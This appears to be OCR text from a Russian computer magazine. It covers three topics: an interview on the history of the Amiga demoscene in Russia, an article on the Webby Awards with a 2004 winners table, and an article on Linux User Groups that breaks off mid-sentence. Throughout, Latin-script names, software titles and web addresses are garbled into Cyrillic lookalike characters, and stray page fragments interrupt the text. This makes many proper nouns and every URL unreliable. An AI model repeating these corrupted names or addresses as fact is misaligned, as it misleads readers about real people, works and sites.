А1200 у нас фактически не продавалась. Стоили А600 порядка $500. Забавная была це- 
новая политика жестких дисков — $200 + количество мегабайт =). Мое знакомство с Ами- 
гой произошло в далеком 1993 году, когда ее в столице можно было найти только в од- 
ном месте — в Доме технической книги на Ленинском проспекте. Там же я первые уви- 
дел Зіаіе оі іЬе Агі, поразившую меня до глубины души. 

ХРЕЬ: Да-да, точно, я помню. Я покупал свою первую Амигу (А600) с винтом на 20 Мб в 
книжном магазине на Ленинском проспекте за $540. Существует версия, что первая 
АтідаЮОО появилась в Москве благодаря космонавту Леонову году в 86-м. В начале 
90-х она была спасена от помойки Александром Сарахатуновым, большим поклонни- 
ком Амиги. Она до сих пор в рабочем состоянии и хранит оттиснутые на внутренней 
стороне крышки автографы создателей Амиги. 

тіпс1\л/0гк: Насколько быстро Амиге удалось завоевать российский рынок? Какие собы- 
тия/факты повлияли на успех этой машины у наших юзеров? 

ѲРМ: «Завоевать» — неподходящее слово, так как высокие цены на Амигу и трудности с 
приобретением свежего ПО не давали ей стать настолько же популярным компьюте- 
ром, как на Западе. Собственно, история Амиги в России — это повторение истории 
Соттосіоге 64 и Аіагі ХЕ/ХІ_. Тем не менее, непревзойденное на то время качество игр 
для Амиги делало ее покупку для каждого любителя компьютеров более чем желанной. 
Безусловно, именно игровой аспект, возможность использования телевизора в качестве 
монитора дали Амиге возможность частично заполнить русский рынок. 
тіпс1\л/0гк: Какие ранние амижные демки получили наибольший успех и признание? 
Вкратце о каждой. 

ѲРМ: Зіаіе оі іЬе Агі Ьу ЗрасеЬаІІз (1992) - это то демо, которое крутили постоянно в ком- 
пьютерных клубах, стимулируя зрителей на покупку Амиги. Я думаю, именно эта дема 
стала толчком для очень многих. 

ХРЕЬ: Я помню, по ТВ крутили какую-то рекламу, в которой внаглую было вставлено нес- 
колько кадров прямо из этой демки. И крутили ее довольно долго. 

ѲРМ: НагсМгеЬ Ьу Сгіопісз & ТЬе Зііепіз (1991), музыку для которой писал небезызвест- 
ный Зезрег Куб. Эезегі Огеапп Ьу Кеігепз (1993). 

ХРЕЬ: Создатели самой известной и революционной демо на РС Зесопб Реаіііу вдохно- 
влялись именно этими произведениями. Эезегі Эгеат, кстати, получила первое место на 
ТЬе 0аіЬегіпд-93. 

ѲйМ: О.0. 5. Ьу Апбготесіа (1991), Агіе Ьу Запііу (1993), Ыехиз 7 Ьу Апбготесіа (1994), ну и 
много других. А в 1995 году наступил переломный момент в демомейкинге, настала эра 
текстур, и чанки ту планар эффектов... Все вышеперечисленные демки являются культовы- 
ми, так как именно в них появились те эффекты, которые годами клонировались с косме- 
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О Тесты: 

• Лазерные принтеры для дома, для семьи 

• Огромный прощальный тест АСР-видеокарт 

• Клавиатуры 

• Открытый тест: 17" ІХй-мониторы 

• Многоканальная акустика 

• Ультракомпактные цифровые камеры 

• Ѵег$и$-тест: тихие кулеры 

О Инфо: 

• Мелочи железа 

• Фишки ИТ 

• Моддинг-сцена 

• Овер-сцена 

• Линейка Аіі 

• Технология 5Ы 

• Знаменитые железки: ІпіеІ Сеіегоп 
•РАО 

О Практика: 

• Разгон: замена охлаждения на видеокарте 

• Ремонт жесткого диска 

• Учим как купить качественное железо 

• Моддинг блока питания 

• Линукс: настройка и тестирование видеокарт 

О Репортаж: 

Один день из жизни монтажника домовой 
локальной сети 

О А также подведение итогов по 16 
новогодним конкурсам! 



ЖУРНАЛ КОМПЛЕКТУЕТСЯ 
ДИСКОМ С ЛУЧШИМ СОФТОМ 




[так выглядели амижные демки (скриншот из Сііаоз Епдіпе)] 
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[амижный эксплорер] 

тическими изменениями на других платформах, включая РС. Также 
нельзя не вспомнить такие колоссы уже новой эры, как: Оа\л/п Ьу 
Агі\л/огк (1995), ТБе 0аіе Ьу Агі\л/огк (1996), 0оа Ьу ТВІ_ (1996), Зкюіі 7 
Ьу ВотЬ (1996), СІозег Ьу СпспсІ (1996), СаріигесІ йгеатз Ьу ТВЬ 
(1997), Риізе Ьу Ыегѵе Ахіз (1997), А1іеп2 Ьу Зсоорех (1998). Про де- 
мы после 1999 года сказать много не могу — они все сплошное 
клонирование =). 

ХРЕЬ: После 1999 года стоящих работ стало меньше. Но работы в 
категориях 64к іпіго стали интересней, чем полноразмерные де- 
мо. Например 64к іпіго 0ііі (0изБ2) Ьу Роііоп (первое место на 
Мекка $утро5іит-2000), написанное всего двумя людьми, один 
из которых музыкант. 

тіпсІ\л/0гк: Расскажи, как появилась и развивалась амижная де- 
мосцена в России. 

0РМ: Появилась демосцена в лице нашей группы І_оокег Ноизе. 
Мы делали титанические усилия для того, чтобы пробиться на ми- 
ровую сцену. Произошло это только в 1997 году после выпуска 
дискмага Іпзотпіа. Также пионерами были СосІеЬизіегз из Украи- 
ны — не Россия, но мы все же говорим на одном языке :). 

ХРЕН: Еще одна группа РизН Епіегіаіптепі появилась чуть позже. 
Вот она-то как раз и пробилась на мировую сцену основательно. 
Они несколько лет подряд на АззетЫу занимали первые места, 
соревнуясь, в основном, в категориях 64к іпіго и 4к іпіго. Им уда- 
лось поднять уровень программирования на невиданные ранее 
высоты. К примеру, в 4к іпіго они первые (после І_оокег Ноизе 4к іп- 
іго СІоі и Ріпк) умудрились вместить простенький синтезатор и му- 
зыку. А в 64к іпіго — навороченный музыкальный трек со сложным 
синтезом и в ЭоІЬу Ргоіодіс. Поэтому то, что все работы в этой ка- 
тегории теперь практически не обходятся без хорошего саунд- 
трека — заслуга, в первую очередь, РизН. 

тіпсІ\л/0гк: Расскажи о программах, которыми пользовались и 
пользуются амижные сценеры: художники, музыканты, кодеры. 
То, что было в коллекции софта любого амижника. 

ХРЕН: Графические редакторы: йеіихе Раіпі, ВгіІІіапсе, Регзопаі Ра- 
іпі, РГюіодепісз, ІтадеЕХ, ЕХРаіпі, СапсІуЕасіогу (мгновенное соз- 
дание логотипов, обложек и т.д.), ЕапіазіісОгеатз. 30-программы: 



Ітадіпе, ЫдПіѴѴаѵе, РеаІЗЭ. Разговор об этих программах требу- 
ет отдельного развернутого диалога. Музыкальные трекеры: Рго- 
Тгаскег, ОсіаМЕО, Мизісііпе, ОідіВоозіег (последний — наиболее 
продвинутый: 256 независимых каналов, программное 08Р, геаі-іі- 
те еііесіз, подключаемые на любые каналы). И практически не- 
возможно найти амижника, который не пользуется файл-мене- 
джером Оігесіогу Ориз'ом. 

тіпсМЭгк: Как амижники общались между собой? 

ХРЕН: Общались так же, как и РС'шники: Фидо, ББС. У меня у са- 
мого была борда, называлась І\Іеоп Эгеат, а у 0ЭМ — Ригріе Оге- 
ат. Пожалуй, они и были самыми центровыми амижными ВВ5 с 
1996 по 1999 год. Обе были забиты амижным софтом: демы, игры, 
дискмаги, свежий софт. У 0ЭМ был винч под гиг, у меня стояло два 
Сй-привода и хард на 4 гига. Со временем, как и все, перебра- 
лись в интернет. Началось время ІРС и ЕТР... 
тіпсМЭгк: Насколько была распространена электронная пресса на 
Амиге? Был ли такой же СМИ бум, как на 7Х? Назови лучшие амижные 
дискмаги и епаперы всех времен (отдельно русские и зарубежные). 
0ЭМ: До 1999 года самым значимым моментом стал выпуск наше- 
го дискмага Іпзотпіа. Именно этот журнал обозначил присутствие 
русских на демосцене. Все это благодаря качеству, которое при- 
равнивалось к эталонам омижной дискмаговой сцены (РОМ и 
РАѴѴ). Над созданием Іпзотпіа работали сценеры из разных 
стран и групп, но основной костяк художников, дизайнеров и музы- 
кантов был из России. Конечно, были и другие журналы: ІІрзігеат 
от Ваіапсе, злобный немецкий Зеепроіпі от Зсоорех (из которого 
мы переманили к себе одного из редакторов), ЭІЗС от Оосіз. 
тіпсМЭгк: Насколько я знаю, на IX заработать деньги написани- 
ем программ было очень проблематично. Как с этим обстояло 
дело на Амиге? 

ХРЕН: Наверное, одна из причин упадка Амиги как раз и состояло 
в том, что большинство коммерческих программ после выхода 
сразу же взламывалось крекерами. 

тіпсМЭгк: Перечисли людей, которые внесли наибольший вклад в 
развитие Амиги и амижной демосцены в России. 

ХРЕН: Все члены І_оокег Ноизе, РизН Епіегіаіптепі, Оиагк, СосІеЬ- 
изіегз (они, кстати, написали классный эмулятор спектрума на 
амиге). Капо и другие. 

тіпс1\л/0гк: Насколько высоким был уровень работ русских амиж- 
ников по сравнению с зарубежными аналогами от мэтров? 

ХРЕН: Журнал Іпзотпіа признан лучшим в мире, а работы РизН Еп- 
іегіаіптепі в свое время всколыхнули всю, не только амиговскую, 
64к іпіго сцену. 

тіпсМЭгк: Встречались ли амижники в риаллайфе? Может, в Мос- 
кве или Питере проводились совместные пьянки, где участвовали 
известные группы? 

ХРЕН: Достаточно редко. Последний раз была тусовка амижников на 
СНаоз Сопзігисііоп. Мы довольно культурные люди, не пьянствуем :). 
тіпс1\л/0гк: Какие годы и события ты бы назвал переломными в ис- 
тории амижной демосцены? 

ХРЕН: Самый переломный момент — когда в 1994 году закрылась 
фирма Соттосіоге. Хотя на демосцену это повлияло только спу- 
стя еще четыре года. 

тіпсМЭгк: Существует ли амижная демосцена в России сейчас? 
ХРЕН: Если говорить о серьезном уровне — нет. Может быть, толь- 
ко в лице РизН Епіегіаіптепі :). И вряд ли что-то изменится. В исто- 
рии демосцены Амига уже заняла свое место. И как бы то ни бы- 
ло, она всегда останется в наших сердцах. 

МіпсМОгк: Амига помогла вам реализовать себя? 

ХРЕН: Несомненно. Один из членов нашей группы в данный момент 
работает в Зпо\л/ЬаІІ Іпіегасііѵе. Многие из бывших демосценеров, 
особенно художники, дизайнеры и музыканты, нашли себе работу 
на телевидении, в кино и геймдевелопе. Все это благодаря Амиге © 



[ЭМУЛЯТОРЫ АМИГИ] 

Для того чтобы поработать на Амиге и посмотреть амижные демки, 
совсем не обязательно покупать новый комп. В Сети есть несколько 
эмуляторов этой платформы, которые превратят твой четвертый пень 
в старую добрую А1200. Самым популярным, пожалуй, является 
эмуль ѴѴІПЦАЕ, для запуска которого достаточно Р 233ММХ, 64 Мб 
ОЗУ и ѴѴІПСІОѴѴ 598 . В эмуле реализована поддержка основных конфи- 
гураций и примочек Амиги, четырех амижных дисководов (в качестве 
дискет используются файлы .асіі), музыкальной карты, мышки, джойс- 
тика и разных портов. 

Скачать эмулятор можно по адресу: Шр://шш.собероеХ.сопп/1)АЕ/6оучп1оа6.Ыт 



[процессор Амиги] 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 






Вершина сетевого 
признания 

«СПАСИБО БОГУ ЗА МАЛЕНЬКИХ КОТЯТ!» — 
СВИДЕТЕЛЯМИ ЭТОЙ ВОСТОРЖЕННОЙ РЕ- 
ЧИ, КОТОРАЯ ПРОЗВУЧАЛА 5 ИЮНЯ 2003 
ГОДА, СТАЛИ СОТНИ ТЫСЯЧ ЛЮДЕЙ ВО 
ВСЕМ МИРЕ. ЕЕ АВТОР — ДЖОЭЛЬ ВЕЙЧ — 
ДО ЭТОГО НИКОГДА НЕ ВЫСТУПАЛ НА ПУ- 
БЛИКЕ И НЕ ПОЛЬЗОВАЛСЯ ВНИМАНИЕМ 
ПРЕССЫ. ВСЕ ИЗМЕНИЛОСЬ, КОГДА ЕГО 
САЙТ ѴѴѴѴѴѴ.ВАТНЕВОООО.СОМ, СОДЕРЖА- 
ЩИЙ ДЕСЯТКИ СОВЕРШЕННО ПРИДУРОЧ- 
НЫХ САМОПАЛЬНЫХ МУЛЬТИКОВ, ЗАВО- 
ЕВАЛ ПРЕСТИЖНЕЙШУЮ ИНТЕРНЕТ-НАГРА- 
ДУ ѴѴЕВВѴ АѴѴАРЮ8 I тіпсІѵѵОгк (тіпсІ\л/Огк@датѳІапсІ.ги) 



За что дают ѴѴеЬЬу? 



Тиффани Шлейн было всего 17 лет, когда в 
1987 году она прилетела в СССР, чтобы на- 
ладить связь между американскими и рус- 
скими студентами с помощью компьюте- 
ров и модемов. Но радужные перспективы 
потускнели, когда Тиффани познакоми- 
лась с Союзом поближе и увидела, на ка- 
ком антиквариате работает наш человек. 
Вернувшись на родину, девушка продол- 
жала вести активную интернет-пропаган- 
ду, а в 1996 году заняла пост директора по 
дизайну в престижном компьютерном жур- 
нале ТІте ѴѴеЬ Мадаііпе. Именно там ей 
пришла в голову идея создать ежегодную 
интернет-премию, которая будет присуж- 
даться авторам самых интересных и ори- 
гинальных сайтов. Название появилось са- 
мо собой — ѴѴеЬЬу, а учредителем высту- 
пил издатель журнала, компания ЮѲ. 




[Тиффани Шлейн, основательница ѴѴеЬЬу Аѵѵагсіз] 



Первая церемония награждения ѴѴеЬЬу состоялась 7 марта 1997 го- 
да в одном из ночных клубов Сан-Франциско. Победителей в пятнад- 
цати различных номинациях определяли как члены жюри, в которое 
входили организаторы мероприятия, так и обычные юзеры. Сетевики 
с большим интересом откликнулись на ѴѴеЬЬу — 40 тысяч человек 
посетило сайт в момент онлайн-трансляции. И это было только нача- 
ло — пресса подхватила свежую идею и разнесла ее по всему миру. 
Со временем ЮС прекратила выпуск ТЬеѴѴеЬ Мадаііпе, а сотрудни- 
ки журнала стали первыми членами Международной Академии ци- 
фровых искусств и наук. Именно эта организация, к настоящему вре- 
мени включающая более пятисот мемберов, каждый год занимается 
определением лучших сайтов в разных областях. В основном это ве- 
дущие сетевые эксперты, ІТ-бизнесмены, политики, журналисты, звез- 
ды шоу-бизнеса и другие известные люди (среди прочих: музыкант 
Дэвид Боуи, певица Бьерк, режиссер Фрэнсис Форд Кополла, отец 
интернета Винт Церф, создатель сериала «Симпсоны» Мэтт Гронинг). 
Помимо официальной ѴѴеЬЬу А\л/агсІ, которую определяет авто- 
ритетное жюри, номинанты могут выиграть Реоріе'з СЬоісе А\л/агсІ 
(приз зрительских симпатий), который получают сайты, набрав- 
шие наибольшее количество баллов по результатам открытого 
сетевого голосования. 

У каждой престижной премии существует свой кубок, будь то стату- 
этка Оскара или золотой мяч, и организаторы мероприятия приду- 
мали символ ѴѴеЬЬу — статуэтку в виде изящной пружины. На цере- 
монии она вручается одному представителю сайта, но Академия 
предоставляет право заказать несколько дубликатов, ведь часто 
над сайтом работают несколько людей и все они заслуживают сво- 
ей пружины :). Также Академия ввела традицию, которая тщательно 
соблюдается с самой первой церемонии, — победители в каждой 
номинации должны произнести благодарственную речь, состоящую 
из пяти слов. Не больше, не меньше. Некоторые пытаются вложить в 
эти пять слов глубинный смысл, но большинство просто прикалывает- 
ся, благо атмосфера на церемонии не то чтобы официальная. На- 
пример речь парней из сетевого журнала ТЬе Опіоп, отхватившего 
первое место в номинации «Юмор», звучала так: «Они сказали, я мо- 
гу только...». Мелкомягкие из МісгозоІТ ѴѴіпсІо\л/5 ІІрсІаіе (первое место 
в «Техническом достижении») заявили: «Я обновляюсь, следователь- 
но, я существую». А представители сайта ѵѵѵѵѵѵ.сіоппіесіогко.сот 
(«Кино») попросили: «Спилберг, дай нам денег!». 

Каждый год количество категорий, в которых выявляются номинан- 
ты, растет. Если вначале это были стандартные «Спорт», «Новости», 
«Политика», «Образование» и тому подобное, то теперь среди них 
хватает экзотики типа «Самый странный», «Креативней всех». Но не 
надейся, что тебе удастся пропихнуть свой раскрученный порно- 
портал. Организаторы ѴѴеЬЬу ясно дают понять, что сайты, содер- 
жащие порнуху, пропаганду насилия, оскорбления в чей-то адрес 
и прочее непотребство, к участию не допускаются. 

Чтобы участникам было проще ориентироваться, по каким крите- 
риям выбирают лучших из лучших. Академия опубликовала на 
официальном сайте ѴѴеЬЬу перечень этих самых критериев. 
Контент — то есть то, что содержит ресурс. Сюда входит не толь- 
ко текст, но и графическое оформление, и даже саунд. 
Структура и навигация — тут учитывается, насколько удобно реа- 
лизована навигация, как подается информация. Ты не должен 
петлять по всему сайту в поисках. Все должно быть интуитивно по- 
нятно и доступно одним-двумя кликами. 

Визуальный дизайн — в этом пункте оценивается общий вид сайта, 
насколько он приятен и оригинален, насколько подходит под тема- 




тику. Нередко сайты завоевыва- 
ли высшую награду именно 
благодаря оригинальному, вы- 
сокотехнологичному дизайну. 

Функциональность — скорость 
работы сайта, его пропускная 
способность, качество оптими- 
зации и другие подобные вещи. 

Интерактивность — здесь гово- 
рится об обратной связи. Чтобы 
сайт был живым и интересным 
своим посетителям, он должен 
не только предоставлять им ин- 
формацию, но и давать воз- 
можность обмениваться ей. Ча- 
ты, форумы, р2р-скрипты, до- 
ски объявлений... если твоему 
ресурсу удается собрать во- 
круг себя интересное комью- 
нити, то, считай, треть пути к на- 
граде ѴѴеЬЬу ты уже прошел. 

Общее впечатление — бывает, 
что вроде сайт и красивый, и есть 
что почитать, и НазЬ-фенечки при- 
сутствуют интересные, но воз- 
вращаться к нему не хочется. И 
при этом через полчаса ты зано- 
сишь в букмарки какую-нибудь [эту пружину дают победителям] 
простенькую МттпІ-страничку, ко- 
торая тебя непонятно чем зацепила. Это и называется общим впечат- 
лением. Сможет ли твой сайт зацепить посетителя? Сможет ли заста- 
вить его возвращаться снова и снова? Это определят члены жюри :). 

В 2003 году впервые в истории ѴѴеЬЬу А\л/агсІ5 церемония награжде- 
ния полностью перекочевала в Сеть. До этого ее проводили снача- 
ла в ночном клубе, потом в оперном зале, вмещающем несколько 
тысяч человек. Организаторы посчитали, что так будет удобнее, но в 
то же время сделали все возможное, чтобы зрители, наблюдающие 
за сетевой трансляцией, ощущали себя ее участниками. А в каче- 
стве ведущих поставили мультяшных героев, пародирующих звезд. 

В отличие от Нобелевской премии, где лауреаты получают миллион 
долларов, победителям ѴѴеЬЬу не дают денег за победу. Тем не ме- 
нее, завоевать золото в таком событии не просто престижно, это 
мощный РР твоей страничке и гарантированное посещение сотен 
тысяч людей. Ссылки на завоевавший премию ресурс будут увеко- 
вечены на ѵѵѵѵѵѵ.и /еЬЬуоѵѵогсІз.соіп и продублированы на огромном 
количестве новостных сайтов, крупнейших журналов разных стран. 
Причем совсем не обязательно, чтобы твоя пага была на английском 
языке. В церемонии предусмотрены номинации для неанглоязычных 
сайтов. Чтобы отсеять любителей халявы, которые готовы ломануться 
проталкивать свой риркіп.пагосі.ги, был введен взнос для всех, кто 
желает поучаствовать. Составляет он $175, если проплатить зара- 
нее, и $195, если внести деньги незадолго до начала (хотя можно и 
не успеть — количество заявок ограничено). Для сайтов благотвори- 
тельных организаций, студенческих и личных страничек существует 
50% скидка. Хотя в некоторых номинациях победителей можно уга- 





[сайт, который каждый год является 
неизменным победителем ѴѴеЬЬу 
как минимум в одной номинации] 




[чемпион среди научных сайтов] 





[победитель среди новостных [музыкальный лидер] 

ресурсов] 



дать заранее. Такие сайты, как Соодіе, Атаюп, Л/а#опа/0ео- 
дгарЫс, иѵе^игпаі, из года в год завоевывают первое место в своих 
категориях. Академия дает возможность поучаствовать сразу в нес- 
кольких номинациях. Например, если у тебя портал про петушиные 
бои, ты можешь выставить его в категориях «Спорт», «Лайфстайл», 
«Геймз», «События» и даже «Еда», правда, за каждую дополнитель- 
ную заявку придется платить по $150. Некоторые сайты уже завоевы- 
вали двойные награды, тот же доодіе.сот, например. 

В мае 2005 года состоится девятая церемония награждения ѴѴеЬ- 
Ьу, и на этот раз количество номинаций возросло до шестидеся- 
ти! Из нескольких тысяч заявленных сайтов Академия выберет по 
пять претендентов в каждой номинации, основываясь на выше- 
упомянутых принципах. А в конце весны организаторы церемонии 
проведут в Нью-Йорке закрытое мероприятие, посвященное 
всем победителям. Там обладатели статуэток смогут познако- 
миться друг с другом, шумно отпраздновать успех и пообщаться 
со знаменитостями. Явка, конечно, не обязательная, но большин- 
ство лауреатов ѴѴеЬЬу с удовольствием принимут участие в этой 
вечеринке. Подобное празднование также будет проведено и в 
Сети, чтобы все, кто не смог приехать, имели возможность разде- 
лить радость с коллегами. Если ты считаешь, что твой сайт вполне 
заслуживает золотой медали, — ознакомься с ЕАО на официаль- 
ном сайте и дождись следующей церемонии. Прием заявок на 
ѴѴеЬЬу-2005 уже закончен, но у тебя есть время, чтобы довести 
свою страничку до ума и представить ее на суд жюри в 2006 году. 
Может быть, мы еще будем гордиться тобой? © 



[НЕКОТОРЫЕ ПОБЕДИТЕЛИ ѴѴЕВВѴ-2004] 




Название категории 


Победитель по решению жюри 


Выбор зрителей 


Сервис 


ѵѵѵѵѵѵ. доодіе.сот 


ѵѵѵѵѵѵ. доодіе.сот 


Коммерция 


ѵѵѵѵѵѵ.аррІе.сот/іІипез/зІоге/зНор.НІт 


ѵѵѵѵѵѵ. еЬау. сот 


Политика 


ѵѵѵѵѵѵ. тееіир. сот 


ѵѵѵѵѵѵ. Ыодіогатегіса. сот 


Сообщество 


ѵѵѵѵѵѵ. ѵѵікіребіа.огд 


ѵѵѵѵѵѵ. ІіѵеіоигпаІ. сот 


Наука 


ѵѵѵѵѵѵ . ехр 1 о гаіо г і и т . есі и 


ѵѵѵѵѵѵ . Ь оѵѵзіи^ѵѵо г кз . со т 


Образование 


ѵѵѵѵѵѵ. ЬЬс. со . и к/зсіепсе/И и тап Ьосіу 


ѵѵѵѵѵѵ.пайопаІдеодгарЫс.сот/есІисаІіоп 


Мода 


ѵѵѵѵѵѵ. со ІеНе.Тг 


ѵѵѵѵѵѵ.зіуіе.сот 


Финансы 


ѵѵѵѵѵѵ. зес.доѵ 


ѵѵѵѵѵѵ. зес.доѵ 


Спорт 


пеѵѵз.ЬЬс.со.ик/зрогІ 


ѵѵ ѵѵѵѵ. езрп. сот 


Игры 


ѵѵѵѵѵѵ. риггіерігаіез. сот 


ѵѵѵѵѵѵ. ЬгеНзріеІѵѵеІІ. сіе 


Правительство и закон 


ѵѵѵѵѵѵ. ЬеаШіуопіагіо. сот 


ѵѵѵѵѵѵіесізіаіз.доѵ 


Здоровье 


ѵѵѵѵѵѵ. кібзНеаИН.огд 


ѵѵѵѵѵѵ . са п се гіасіз . со т 


Юмор 


ѵѵ ѵѵѵѵ. ІЬеопіоп. сот 


ѵѵ ѵѵѵѵ. іЬеопіоп. сот 


Жизнь 


ѵѵѵѵѵѵ. ерісигіоиз. сот 


ѵѵѵѵѵѵ. ерісигіоиз. сот 


Музыка 


ѵѵѵѵѵѵ.арріе.сот/ііипез/зіоге 


ѵѵѵѵѵѵ.арріе.сот/ііипез/зіоге 


Новости 


ѵѵ ѵѵѵѵ . Ь Ьс . со . и к/п е ѵѵз 


ѵѵѵѵѵѵ. іЬезтокіпддип. сот 


Хоумпага 


ѵѵѵѵѵѵ. гаки-дакі. сот 


ѵѵѵѵѵѵ. зІеѵеапсИа.сопл/купап 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІЛЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 






І_іпих ІІзег Ѳгоир 

в России 

У І_ІШХ ВСЕГДА БУДЕТ ПРЕИМУЩЕСТВО ПЕ- 
РЕД ѴѴІІЧЭОѴѴЗ. Я НЕ СОБИРАЮСЬ РАЗВО- 
ДИТЬ ХОЛИВОЙНЫ, КРИЧАТЬ «МІСРЮЗОРТ 
МІІЗТ ЭІЕ!» И ДЕЛАТЬ ДРУГИЕ ПОДОБНЫЕ 
ГЛУПОСТИ. ѴѴІМООѴѴЗ — НЕ ВАЖНО, МАЗДАЙ 
ОНА ИЛИ РУЛЕЗ — ЭТО ВСЕГО ЛИШЬ ОПЕРА- 
ЦИОННАЯ СИСТЕМА. ПРОГРАММА ДЛЯ РС, НЕ 
БОЛЬШЕ И НЕ МЕНЬШЕ. В ТО ЖЕ ВРЕМЯ ЗА 
ЫІЧІІХ СТОИТ ЦЕЛОЕ СООБЩЕСТВО, НАСЧИ- 
ТЫВАЮЩЕЕ ОГРОМНУЮ АРМИЮ ПОКЛОННИ- 
КОВ. ИМЕННО ОБ ЭТОМ СООБЩЕСТВЕ Я ТЕ- 
БЕ СЕГОДНЯ И РАССКАЖУ I Илья Александров 
(кгоТ3 1 337@п\л/д5гп . ги) 



Как тусят линуксоиды 

[что такое ШѲ?] Ыпих ІІзег Ѳгоир (ШѲ) — 
это некоммерческое неформальное 
объединение пользователей операци- 
онной системы ѲІЧІІ/І_іпих, проживающих 
на определенной территории. То есть 
практически в каждом более или менее 
крупном городе найдется свой ШѲ. Уз- 
нать, есть ли такая группа в твоем горо- 
де, можно на сайте ѵѵѵѵѵѵ.Іид.ги, где со- 
держится информация о всех лагах на 
территории нашей необъятной Родины. 
Как известно, у большинства коммерче- 
ских компаний существует служба тех- 
поддержки, которая помогает пользова- 
телю разобраться в приобретенном про- 
дукте. Линукс — система некоммерче- 
ская, поэтому роль техподдержки берет 
на себя Ыпих ІІзег Ѳгоир. 



і/ш.Іид.ги 
ѵ\/т/.8рЬ.Іид.ги 
и / и / и /, ѵоідодгаб.іид.ги 

Если ты до этого никогда не 
интересовался открытым 
ПО, почитай статьи Ричарда 
Сталлмана и Эрика 
Раймонда (особенно его 
статью «Собор и базар»). 
Просто вбей в яндексе эти 
имена, и ты утонешь в море 
информации! 



В России самыми многочисленными и ак- 
тивными ШѲ'ами являются московский и 
питерский. Московская группа образо- 
валась раньше всех в России: в октябре 
1998 года, а основателем стал студент 
химического факультета МГУ Тимофей Ко- 
ролев с тремя друзьями-линуксоидами. 
Домен, который они зарегистрировали, 
— соипіег.Іі.огд — служил официальным 
сайтом ШѲ и со временем изменился на 
гпозсоѵѵ.Іид.ги. После того как о группе 
рассказали на новостном сайте пе- 
ѵоб.ги, ее состав расширился с четырех 
до тридцати человек. Причем многие 
вступившие в лаг люди были лучшими ИТ-специалистами Рос- 
сии: Виктор Вагнер, Олег Бройтман, Дмитрий Саякин и другие. 
Группа быстро разрасталась, помимо специалистов, к ней 
стали присоединяться студенты и просто все, кому нравился І_і- 
пих. Вскоре Тимофей Королев и его друг Евгений Соколов реши- 
ли реализовать серьезный проект для развития свободного ПО. 
Им ста лііпих-опііпе.ги, один из самых популярных е-шопов, рас- 
пространяющих дистрибутивы Ыпих и ВЗЭ. Сегодня Мозсо\л/ І_і- 
пих ІІзег Ѳгоир — самый многочисленный лаг в России, насчиты- 
вающий более 300 мемберов. 

В середине 2003 года линуксоидные группы были зарегистриро- 
ваны во всех 50 штатах США, в девяти из десяти канадских про- 
винций, в 76 районах Индии и в более чем ста других странах. 
Эти цифры иллюстрируют масштабность явления. В некоторых 
крупных городах существует не одна, а несколько групп пользо- 
вателей, хотя чаще всего люди стараются объединиться в один 
большой и влиятельный ШѲ. Я назвал лаги неофициальной орга- 
низацией, но зарегистрированные группы тоже встречаются. 
Регистрация освобождает от налогов, упрощает работу и дает 
определенные гарантии. Хотя нужно ли это небольшим группам, 
которые не имеют значительных материальных средств? Вряд 
ли. Поэтому группы пользователей Ыпих — обычно именно нео- 
фициальные организации. 



[цели ШѲ] Цели у каждой группы разные и могут меняться с уче- 
том местной специфики. Ыпих лишен бюрократии и централи- 
зованного контроля, это относится и к группам его пользовате- 
лей. Тем не менее, главная цель всегда одна — пропаганда І_і- 
пих. Роль ШѲ в продвижении свободного ПО трудно переоце- 
нить, учитывая небольшую распространенность оси. Помимо 
групп, агитаторами являются и журналисты, пишущие статьи об 
ореп зоигсе. Но журналист может лишь рассказать, дать крити- 
ческую оценку, не более. А группа пользователей поможет но- 
вичку в установке и изучении новой ОС, предоставит возмож- 
ность общения с единомышленниками. Члены ШѲ рассказыва- 
ют о достоинствах своей системы друзьям и знакомым, те, в 
свою очередь, сообщают о системе другим людям. Кто-то обя- 
зательно захочет попробовать и со временем перейдет на Ли- 
нух окончательно. Многие лаги занимаются бесплатным рас- 
пространением дистрибутивов и документации о ІЛЧІХ. Наш че- 
ловек может не интересоваться опенсорсными системами, но 
от халявы не откажется. 

Задачей ШѲ также является поддержание дружелюбной атмо- 
сферы внутри. Мемберы встречаются, обсуждают ось, пьют пиво. 
Аинус Торвальдс создавал свою систему ради удовольствия, и 
ШѲ демонстрирует пользователям, что удовольствие можно по- 
лучать от простого использования Ыпих. А также от сопутствую- 
щего развития интеллекта, от процесса превращения из рядово- 
го юзера в хакера. Новички наверняка захотят познакомиться с 
культурой, философией и традициями Линукс-движения. Во всем 
этом им поможет Ыпих ІІзег Ѳгоир. 



[деятельность ШѲ] Каждая группа имеет свой сайт, на котором 
обычно находятся многочисленные руководства по ІЛЧІХ, напи- 
санные самостоятельно или переведенные с английского, все- 
возможные программы для Линукс, новости и форум. Часто мож- 
но встретить список членов группы, их контакты, а также инфор- 
мацию о следующих встречах и проектах, в которых участвует 
ШѲ. Поскольку в ШІѲ'ах, как правило, немало программистов, то 
многие из них пишут софт и драйвера под свободно распростра- 
няемые системы. 

Некоторым ШѲ'ам удалось добиться больших успехов в про- 
движении ОС. Благодаря волгоградской группе, в 150 школах 



Тем, кто только планирует 
создать свою группу 
пользователей ііпих, 
организация Сіеѵеіапсі ііпих 
іізег'з вгоир предоставляет 
Ш 6- имена в домене Іид.пеі. 
Для этого достаточно 
зарегистрироваться на 
сайте организации и 
сообщить название города, 
в котором ты живешь. 



® і от, піи ішюпи плапѵі^іуоі ЗТОГО ГО|ЭОДО ИНфО|ЭМОТИКО 

создать свою группу будет преподаваться на 

пользователей ііпих, компьютерах с установлен- 

ным на них дистрибутивом 
АН Ыпих. Как утверждает 
Тарас Абламский, лидер 
группы, это событие вызва- 
ло сильный резонанс в сре- 
де преподавателей и руко- 
водителей школ. В Волго- 
градском государственном 
университете состоялся се- 
минар для преподавателей по вопросам использования ОС 
Линукс в образовательных учреждениях, который посетило бо- 
лее 60 человек. ШѲ заключил соглашение с этими школами, и 
его мемберы будут продолжать помогать учителям и детям ос- 
ваивать систему. 

Еще дальше пошла запорожская Ыпих ІІзег Ѳгоир (Ііпих. хр.ио), 
сделавшая свой собственный линух-дистрибутив ВІіп. Этот І_і- 
ѵеСЭ отличался очень развитой поддержкой сетевых техноло- 
гий и обширным набором зесигііу-софта, за что получил зва- 
